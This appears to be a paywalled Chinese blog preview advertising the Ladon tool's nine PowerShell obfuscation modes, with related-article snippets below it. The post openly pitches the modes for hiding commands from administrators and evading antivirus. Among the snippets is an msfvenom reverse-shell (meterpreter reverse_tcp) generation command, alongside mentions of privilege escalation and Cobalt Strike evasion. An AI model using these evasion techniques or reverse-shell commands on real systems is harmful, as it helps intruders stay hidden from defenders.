Ladon九种PowerShell命令混淆加密免杀方法

最新推荐文章于 2024-03-06 18:07:32 发布
VIP文章 最新推荐文章于 2024-03-06 18:07:32 发布
阅读量1.6k 收藏 4
点赞数
分类专栏: Ladon
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/109460040
版权

九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。
Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。
Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能
管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。

更新功能

GUI 2020.10.18
[+] PowerShell转EXE,EXE转PowerShell
EXE->Powershell
PowerShell->EXE
[+] 九种PowerShell命令混淆(随机加密)

HexCommand
AsciiCommand
BinaryCommand
CompressedCommand
BXORCommand
OctalCommand
SpecialCharOnlyCommand
SecureStringCommand
Base64Command
DecodeBase64

应用场景

1.隐藏执行PowerShell命令代码,不让管理员知道你意图
2.PowerShell脚本免杀(很多杀软对脚本的查杀能力很弱)

演示教程

文本框1填写PowerShell代码或PowerShell命令(包含在Powershell中能执行的CMD命令)

Write-Host 'Hello K8gege!' -ForegroundColor Green; 
Writ
最低0.47元/天 解锁文章
k8gege
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
〖教程〗LadonGO免杀Win10 Defender
K8哥哥
08-03 1374
Wiki http://k8gege.org/Ladon/LadonGo.html 简介 LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.8版本包含32个功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell,12种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis/Mong
powershell脚本编写_病毒分析学习笔记:powershell混淆
weixin_39631370的博客
12-21 2359
本文为看雪论坛精华文章看雪论坛作者ID:OK繃目录一、前言二、自动化反混淆 混淆原理 自动化反混淆工具三、手动反混淆四、总结一、前言Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windo...
基于java和PowerShell使用SHA-256和BASE64加密字符串的进制位计算差异
最新发布
qq_31412425的博客
03-06 843
Java 示例中的【结果1】使用的是标准的 Java 加密库中的 MessageDigest 类来计算 SHA-256 哈希值,然后使用 BASE64Encoder 类将二进制哈希值转换为 BASE64 编码的字符串。【结果2】的BASE64计算输出则与使用PowerShell计算相同 ,因为在PowerShell中使用的是命令来计算文件的 SHA-256 哈希值,该输出对应java【结果2】中十六进制SHA-256的计算。
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 744
免杀对抗-Powershell-混淆无文件
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 596
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
powershell恶意脚本解混淆
信息安全
11-11 1679
文章目录前言分析总结 前言 现在许多病毒作者为了免杀,使用powershell脚本来执行恶意行为的病毒越来越多,这次分析的一个样本就是利用powershell混淆来隐藏嵌在其中的cs后门dll 分析 样本代码 从图上可以很清晰的知道存放了一段base64数据,首先将base64数据解密,使用gzip解压,解压的数据进行执行 想要解密,也很简单: IEX用于将字符串作为命令执行,当去掉IEX后,再文件尾加上| out-file decode.txt 将 IEX (New-Object IO.StreamRe
shell脚本代码混淆
ZXW_NUDT的博客
11-04 1465
shell脚本代码混淆
Powershell绕过执行及脚本混淆
hl1293348082的专栏
03-28 1170
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。 Windows Server 的 Shell,也就是从 Dos 继承过来的命令行,处理简单问题尚可,一旦遇到稍微复杂一点的问题,它就会把本已复杂的问题,弄得更加复杂。 引入 VBScript,使得 WindowsServer 管理员处理问题的效率提高了不少。但 VBScript 是个脚本语言,即缺乏 Shell 的简单性,也不能.
Ladon6.0_PowerShell_oracle_漏洞检测_目标检测_扫描器_快速目标检测_
10-03
Ladon6.0 PowerShell版,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。6.5版本内置70个功能模块
Ladon5.8大型网络渗透扫描器&源码
12-15
5.7版本内置40个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、...
Powershell恶意代码的N种姿势 - FreeBuf.pdf
07-23
powershell内网渗透很好的,推荐一下,网络安全从业者,推荐的学习的脚本,在APT渗透测试中也很好
Ladon-master.zip
06-16
Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。
Ladon简明教程 _ K8哥哥1
08-03
前言本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。完整文档:http://k8gege.org/Ladon (ht
Ladon以指定用户权限运行程序或命令_K8哥哥1
08-03
前言Ladon内置Runas允许用户用其他权限运行指定的工具和程序。系统自带Runas命令需要交互式登陆,在webshell或不支持交互式的shell下使用麻烦
深入理解Shellcode混淆加密技术
weixin_51030879的博客
07-07 781
Shellcode是攻击者利用漏洞进行远程代码执行的核心部分。然而,传统的Shellcode往往被防御机制所检测和拦截。为了绕过这些防御机制,攻击者采取了一系列混淆加密技术来隐藏Shellcode的真实意图和功能。在本文中,我们将深入探讨Shellcode混淆加密技术的原理和实践。一、Shellcode简介Shellcode是一段用于利用计算机系统中的漏洞或进行恶意活动的机器码。它通常是由黑客编写的,并被注入到受攻击的系统中,以执行特定的操作,比如获取系统权限、执行远程命令、下载和安装恶意软件等。
cs免杀之基于混淆和加壳
weixin_54855337的博客
04-14 3990
写在前面 最近也是没什么状态以及被身边人,事,物所受影响,环境对自己的影响也是非常大,但是随着时间的变化一切也都会改变,离群所居者,不是神灵,就是野兽,所以说需要脱离这种状态,找到自己人生中明确的方向,不能一天天的萎靡不正 简单进行混淆和加壳 其实早在去年11月左右就玩过一点cs,但是那个时候还是懵懵懂懂,虽然现在也是一样的 打开服务端,192.168.4.191为自己的ip也可以127.0.0.1,然后123123为连接密码 使用java或者bat再或者sh打开都可以,然后就是双..
〖教程〗Ladon提权Win2016/Win10/MSSQL2016
K8哥哥
01-21 1571
测试环境 Windows Server 2016 SQL: 13.0.1601.5 Microsoft Windows [Version 10.0.14393] Ladon本地用户权限提权 网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权 MSSQL远程加载Ladon提权 执行SQL查询权限为network service 远程内存加载PowerLadon提权 exec master..xp_cmdshell
免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
xiaoheizi的博客
09-13 1046
1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。
x-ladon x-argus python
09-18
X-Ladon和X-Argus是Python编程语言的两种库或框架。它们都是用于网络安全领域的工具,并且都提供了许多有用的功能。 X-Ladon是一个轻量级的Python库,用于开发和部署RESTful风格的Web服务。它旨在提供一种简单、可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值